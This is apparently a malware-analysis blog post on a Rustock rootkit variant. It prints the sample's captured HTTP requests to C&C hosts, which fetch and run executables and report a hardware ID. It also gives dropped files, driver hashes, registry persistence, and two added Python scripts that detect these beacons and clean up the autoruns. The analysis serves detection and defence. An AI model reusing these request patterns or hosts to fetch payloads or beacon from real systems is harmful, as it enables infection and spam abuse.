Rustock is back again more active than ever!

Recently Steve received some new .EXE files classified as Rootkit.Rustock, and we analyzed one of them to see whether the Rustock beast is still active. The bad news is that the results of this analysis show that Rustock's spam activity is still going strong.

During the analysis we noticed that the malware used an unusual User-Agent string, Gootkit ldr 1.0, when talking to one specific host. Is this the name of a new malware kit?

Once executed, the .EXE injected code into services.exe and then started sending a series of GET requests to a single domain:

195.2.253.246 (catjepzcft.com)

Network traffic:

GET /progs/ptpqq/pmzznaann.php?adv=advxxx HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/mmjjwjxt.php HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/ebbxlllly.php HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/spcmmzmnak.php HTTP/1.1
Host: catjepzcft.com

Each of the .php URLs above redirects to a PE (Portable Executable) file; the files are all downloaded into the TEMP folder and then executed with a hidden window.

Rustock spam bots carry their C&C (Command and Control) domain names hardcoded in the malware code. Because the bot resolves a name instead of connecting to a fixed IP, the authors can move the controlling hosts dynamically simply by re-pointing the DNS records. This Rustock variant issued requests to these domains:

yopilazankaza.net
grezasadaf.info
mail.grezasadaf.info

Next, we noticed that the malware sent some encrypted traffic to this IP:

74.52.83.83 (user.happyhost.org)

The request below shows the malware reporting back to the malicious domain, including our hardware ID so that the infected machine can be identified (the value is shown as -[HD_ID] here):

GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-[HD_ID]&p=1 HTTP/1.1
Host: catjepzcft.com

Next, it started traffic with another domain:

ctfmon.info
110.60.233.72.static.reverse.ltdomains.com
72.233.60.110

Network traffic:

GET /cd/cd.php?id=5V9B6019C6A1FA0&ver=nz0 HTTP/1.1
Host: ctfmon.info

And at this point, the malware started to send data to a new IP:

92.62.101.27 (ds27.esthost.eu)

Network traffic:

GET /d3n2829230.dat HTTP/1.0
User-Agent: Gootkit ldr 1.0
Host: 92.62.101.27:5191

Note the User-Agent string: Gootkit ldr 1.0.
It may be the name of a NEW malware kit, and "ldr" presumably stands for loader. Note also that this request is plain HTTP/1.0 sent straight to the IP on port 5191, with no domain name involved: a custom User-Agent, a bare-IP Host header and a non-standard port together make this download easy to pick out in proxy or IDS logs.
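To show how the beacons above can be matched in practice, here is an added example (our own code, not part of the original post or of the malware): it parses raw HTTP requests and flags the known C&C hosts, the /progs/.../*.php loader URIs, the hardware-ID report, the cd.php check-in and the Gootkit loader download to a non-standard port. The indicator set is taken only from the requests printed in this post and is not a complete Rustock/Gootkit signature; the sample requests are constructed from those same lines plus one benign control request.

```python
"""Added example, not code from the original post: flag the HTTP beacons seen in
this analysis.  The indicator set is taken from the requests printed in the post
(not a complete signature); SAMPLE_REQUESTS are constructed from those lines
plus one benign control request."""
import re
from urllib.parse import urlsplit, parse_qs

# Hosts contacted in the capture (domains and bare IPs from the post).
KNOWN_C2_HOSTS = {
    "catjepzcft.com", "yopilazankaza.net", "grezasadaf.info", "mail.grezasadaf.info",
    "ctfmon.info", "damqrgldev.net", "74.52.83.83", "72.233.60.110", "92.62.101.27",
}
# URI shapes seen in the capture: /progs/<dir>/<name>.php and /cd/cd.php
LOADER_PATH = re.compile(r"^/progs/[a-z]+/[a-z]+\.php$")
CHECKIN_PATH = re.compile(r"^/cd/cd\.php$")


def parse_request(raw):
    """Split a raw HTTP request (request line + headers) into the fields we match on."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, target, version = lines[0].split()
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    host, _, port = headers.get("host", "").partition(":")   # "ip:5191" -> port 5191
    parts = urlsplit(target)
    return {
        "method": method, "version": version,
        "host": host.lower(), "port": int(port) if port else 80,
        "path": parts.path, "query": parse_qs(parts.query),
        "user_agent": headers.get("user-agent", ""),
    }


def classify(req):
    """Return the list of indicator names a parsed request matches (empty if none)."""
    reasons = []
    q = req["query"]
    if req["host"] in KNOWN_C2_HOSTS:
        reasons.append("known-c2-host")
    if req["user_agent"].startswith("Gootkit ldr"):
        reasons.append("gootkit-loader-ua")
    if LOADER_PATH.match(req["path"]):
        if "adv" in q:
            reasons.append("rustock-loader-uri")
        if "id" in q and "code1" in q:          # the hardware-ID report (id=-[HD_ID])
            reasons.append("hardware-id-beacon")
    if CHECKIN_PATH.match(req["path"]) and {"id", "ver"}.issubset(q):
        reasons.append("cd-checkin")
    if req["path"].endswith(".dat") and req["port"] not in (80, 443):
        reasons.append("dat-download-nonstandard-port")
    return reasons


# Constructed from the GET lines in the post; the last one is a benign control.
SAMPLE_REQUESTS = [
    "GET /progs/ptpqq/pmzznaann.php?adv=advxxx HTTP/1.1\nHost: catjepzcft.com\n",
    "GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-[HD_ID]&p=1 HTTP/1.1\n"
    "Host: catjepzcft.com\n",
    "GET /cd/cd.php?id=5V9B6019C6A1FA0&ver=nz0 HTTP/1.1\nHost: ctfmon.info\n",
    "GET /d3n2829230.dat HTTP/1.0\nUser-Agent: Gootkit ldr 1.0\nHost: 92.62.101.27:5191\n",
    "GET /index.html HTTP/1.1\nHost: www.example.com\nUser-Agent: Mozilla/5.0\n",
]


def scan(raw_requests):
    """Return [(host, reasons)] for every request that matched at least one indicator."""
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = classify(req)
        if reasons:
            hits.append((req["host"], reasons))
    return hits


if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_REQUESTS):
        print(host, ", ".join(reasons))
```

The host list is the weakest indicator here (the domains are disposable, as the hardcoded-domain scheme above is designed for); the URI shape, the query parameters and the custom User-Agent survive a domain change and are the rules worth keeping.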

New traffic:

GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net
 
GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net

The malware downloaded several more malicious files into the TEMP folder and executed all of them. At this point it started sending a large amount of encrypted data to a host already seen above:

92.62.101.27 (ds27.esthost.eu)

Network traffic:

Packets: 505
Data size: 329,768 bytes
Total size: 350,040 bytes

Then the heavy SPAM activity began: the malware started issuing DNS requests for a large number of mail servers:

Screenshot

And then the spambot started sending a huge number of spam messages. The SPAM campaign is now more active than ever!

Screenshot

Now let's see which files were created by this Rustock variant:

C:\WINDOWS\system32\drivers\50cb8405.sys => DRIVER OF THE ROOTKIT
C:\mtoaphpo.exe
C:\lcrywx.exe
C:\shcu.exe
C:\1630016.bat
C:\paohiqlm.exe
C:\-[HARDWARE_ID]
C:\WINDOWS\system32\drivers\lmo08ed.sys => ANOTHER DRIVER OF THE ROOTKIT
C:\DOCUME~1\user\LOCALS~1\Temp\2081034192.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2092050032.exe
C:\hhfls.exe
C:\WINDOWS\system32\dllcache\svchost.exe.new
C:\ntgxbfmx.exe
C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
C:\adwitwxa.exe
C:\zmuvmq.bat
C:\xuulbic.exe
C:\WINDOWS\system32\crypts.dll
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\rip10.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2.exe
C:\DOCUME~1\user\LOCALS~1\Temp\7hjhffd.bat
C:\Program Files\Common Files\imlhy.dll
C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe

Below are the virus scanner reports for the two rootkit drivers:

Report Generated: 16 March 2009 at 00:25:01 (GMT+1)
File Name: 50cb8405.sys
File Size: 101 KB
MD5 Hash: 3B51541EB5EAE7342A191EF17C8B3D60
SHA1 Hash: 70A7C283EE4DFCE6AF490FB256FF944185238C20
Detection Rate: 3 of 24 (12.5 %)
Status: INFECTED

Antivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 –
Avira AntiVir 7.1.2.171 8.1.2.12 TR/Rootkit.Gen
Avast 090314-0 4.8.1229 –
AVG 270.11.15/2003 8.0.0.0 –
BitDefender 16/03/2009 7.0.0.2555 Backdoor.Rustock.NFE
ClamAV 15/03/2009 0.93.1.0 –
Comodo 1057 3.8 –
Dr.Web 16/03/2009 5.0 –
Ewido 16/03/2009 4.0.0.2 –
F-PROT 6 20090315 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 14/03/2009 1001044 –
Kaspersky 16/03/2009 8.0.0.357 –
McAfee 15/03/2009 5.1.0.0 –
Malware Hash Registry 16/03/2009 N/A –
NOD32 v3 3937 3.0.677 –
Norman 2009/03/13 5.92.08 –
Panda 07/02/2009 9.5.1.00 –
QuickHeal 14 March, 2009 10.0 –
Solo Antivirus 16/03/2009 8.0 –
Sophos 16/03/2009 4.32.0 –
TrendMicro 895(589500) 1.1-1001 –
VBA32 16/03/2009 3.12.0.300 Malware-Cryptor.Win32.General.3
VirusBuster 10.102.11 1.4.3 –

Report Generated: 16 March 2009 at 00:26:02 (GMT+1)
File Name: lmo08ed.sys
File Size: 21 KB
MD5 Hash: 1614229CC85D2F0DA1668BEC2AA2966E
SHA1 Hash: F2347ABAD8541540040D69DF6EC7F9104B998C74
Detection Rate: 1 of 24 (4.17 %)
Status: INFECTED

Antivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 –
Avira AntiVir 7.1.2.171 8.1.2.12 –
Avast 090314-0 4.8.1229 –
AVG 270.11.15/2003 8.0.0.0 –
BitDefender 16/03/2009 7.0.0.2555 –
ClamAV 15/03/2009 0.93.1.0 –
Comodo 1057 3.8 –
Dr.Web 16/03/2009 5.0 –
Ewido 16/03/2009 4.0.0.2 –
F-PROT 6 20090315 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 14/03/2009 1001044 –
Kaspersky 16/03/2009 8.0.0.357 –
McAfee 15/03/2009 5.1.0.0 –
Malware Hash Registry 16/03/2009 N/A –
NOD32 v3 3937 3.0.677 –
Norman 2009/03/13 5.92.08 Trojan W32/Rootkit.AJUT
Panda 07/02/2009 9.5.1.00 –
QuickHeal 14 March, 2009 10.0 –
Solo Antivirus 16/03/2009 8.0 –
Sophos 16/03/2009 4.32.0 –
TrendMicro 895(589500) 1.1-1001 –
VBA32 16/03/2009 3.12.0.300 –
VirusBuster 10.102.11 1.4.3 –

The rootkit always installs its usual three SSDT hooks, and this time we can see that it also hides its own driver. Because the driver is hidden from the running system, file and driver listings taken on the infected machine cannot be trusted; compare them with an offline scan of the disk:

Screenshot

Hidden Driver:

Screenshot

Stealth Code:

Screenshot

Kernel Modifications:

Screenshot

And below is a HijackThis log:

Running processes:
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe

O4 - HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 - HKLM\..\Run: [y0agaspmnmxkw4djb3as16eeuar] C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
O4 - HKLM\..\Run: [t50zoy0kqddd9qjam7lfo] C:\DOCUME~1\user\LOCALS~1\Temp\f35avpt2j.exe
O4 - HKLM\..\Run: [krae4io3anewkh6n1c32] C:\DOCUME~1\user\LOCALS~1\Temp\go82c4irn.exe
O4 - HKLM\..\Run: [i3ommwe1iq63eplz1l5shm39kd3nr] C:\DOCUME~1\user\LOCALS~1\Temp\ldav9bgf.exe
O4 - HKLM\..\Run: [wlad2loiah66phy9e] C:\DOCUME~1\user\LOCALS~1\Temp\s7rg8a.exe
O4 - HKLM\..\Run: [kq005y3gtd5grvxemgyp77puvoxeh] C:\DOCUME~1\user\LOCALS~1\Temp\ceu9gzw17.exe
O4 - HKLM\..\Run: [y2l3ad3xmfd99c18hrirbgvnztg] C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
O4 - HKLM\..\Run: [ejk9b1onvd75gfmvp2j] C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
O4 - HKLM\..\Run: [bicya6fq4l8rm17m0e3tk] C:\DOCUME~1\user\LOCALS~1\Temp\rh1lty.exe
O4 - HKLM\..\Run: [aotn8li6zj2a9a3pd5nk7y] C:\DOCUME~1\user\LOCALS~1\Temp\p27p2.exe
O4 - HKLM\..\Run: [x4veff6kyajo16mhq18ujw8vj3dpa] C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
O4 - HKLM\..\Run: [omxf835aubqqpxvzfdvre094g2m0m] C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
O4 - HKLM\..\Run: [eo8in0uixmmd988l5dtstn0gju] C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
O4 - HKLM\..\Run: [e9vetnuspuff604s9iu4bpt] C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
O4 - HKLM\..\Run: [urg2avbreylonz] C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe
O4 - HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 - HKCU\..\Run: [xjtsi4b3oq3] C:\DOCUME~1\user\LOCALS~1\Temp\pyphk.exe
O4 - HKCU\..\Run: [qcsn79k6rirjgr] C:\DOCUME~1\user\LOCALS~1\Temp\l2jna51.exe
O4 - HKCU\..\Run: [oso3bevvdmzr1] C:\DOCUME~1\user\LOCALS~1\Temp\bvtrncc.exe
O4 - HKCU\..\Run: [ubvttqcqfdt7yxo4gt9opxraitvp] C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
O4 - HKCU\..\Run: [qiojoeqys7e1f4kgazo4eycu8] C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 - Winlogon Notify: crypt - C:\WINDOWS\SYSTEM32\crypts.dll

The malware also disabled regedit.exe: as this entry shows, it set the DWORD value DisableRegedit to 1. Since this is an HKCU policy it only affects the current user, and it can be reset with reg.exe or Group Policy once the rootkit driver has been removed; doing it while the driver is still loaded is unreliable, because the rootkit hooks the registry calls.

O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
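As an added example (our own code, not from the original post or from HijackThis), the script below triages a log like the one above: it flags O4 autoruns that point into the user's Temp folder or carry random-looking value names, the O7 DisableRegedit policy, and the O20 Winlogon Notify DLL, and then emits the reg.exe commands that would remove them. SAMPLE_LOG is a constructed excerpt made of lines from the post plus one benign autorun; the expansion of HijackThis's "..\Run" shorthand to the full Run key and of O20 entries to the Winlogon\Notify key is standard, while the random-name rule is a heuristic chosen for this example.

```python
"""Added example, not code from the original post: triage a HijackThis log for the
persistence this sample leaves behind and emit reg.exe clean-up commands.
SAMPLE_LOG is a constructed excerpt (lines from the post plus one benign entry);
the random-name rule is a heuristic chosen here."""
import re

O4_RE = re.compile(r"^O4 - (?P<hive>HKLM|HKCU)\\\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<path>.+)$")
O7_RE = re.compile(r"^O7 - (?P<key>\S+), (?P<value>\w+)=(?P<data>\S+)$")
O20_RE = re.compile(r"^O20 - Winlogon Notify: (?P<name>\S+) - (?P<path>.+)$")
TEMP_RE = re.compile(r"\\(LOCALS~1|Local Settings)\\Temp\\", re.I)
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"        # what HijackThis abbreviates as ..\Run
NOTIFY_KEY = r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"

SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 - HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 - Winlogon Notify: crypt - C:\WINDOWS\SYSTEM32\crypts.dll
"""


def looks_random(name):
    """Heuristic: long, all lowercase letters and digits, with both present (e.g. xsigsud7qw7f8rwrt8)."""
    return (len(name) >= 10 and re.fullmatch(r"[a-z0-9]+", name) is not None
            and any(c.isdigit() for c in name) and any(c.isalpha() for c in name))


def triage(log_text):
    """Return (section, registry key, value/name, target, flags) for every suspicious entry."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip().replace("\u2013", "-")     # web copies often turn '-' into an en dash
        if m := O4_RE.match(line):
            flags = []
            if TEMP_RE.search(m["path"]):
                flags.append("autorun-from-temp")
            if looks_random(m["name"]):
                flags.append("random-value-name")
            if flags:
                findings.append(("O4", m["hive"] + "\\" + RUN_KEY, m["name"], m["path"], flags))
        elif (m := O7_RE.match(line)) and m["value"] == "DisableRegedit" and m["data"] == "1":
            findings.append(("O7", m["key"], "DisableRegedit", m["data"], ["regedit-disabled"]))
        elif m := O20_RE.match(line):
            findings.append(("O20", NOTIFY_KEY + "\\" + m["name"], m["name"], m["path"],
                             ["winlogon-notify-dll"]))
    return findings


def remediation(findings):
    """reg.exe commands that undo the entries.  Run them only after the rootkit
    driver is gone: while it is loaded, registry writes may be hooked or reverted."""
    cmds = []
    for section, key, name, _target, _flags in findings:
        if section in ("O4", "O7"):
            cmds.append(f'reg delete "{key}" /v "{name}" /f')   # delete one value
        elif section == "O20":
            cmds.append(f'reg delete "{key}" /f')               # delete the whole Notify\<name> key
    return cmds


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for entry in found:
        print(entry)
    print("\n".join(remediation(found)))
```

The dropped executables themselves still have to be deleted from Temp (and crypts.dll from system32) after the Run values are gone, and since the O4 entries here are mostly under HKLM, the clean-up needs an administrative shell.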
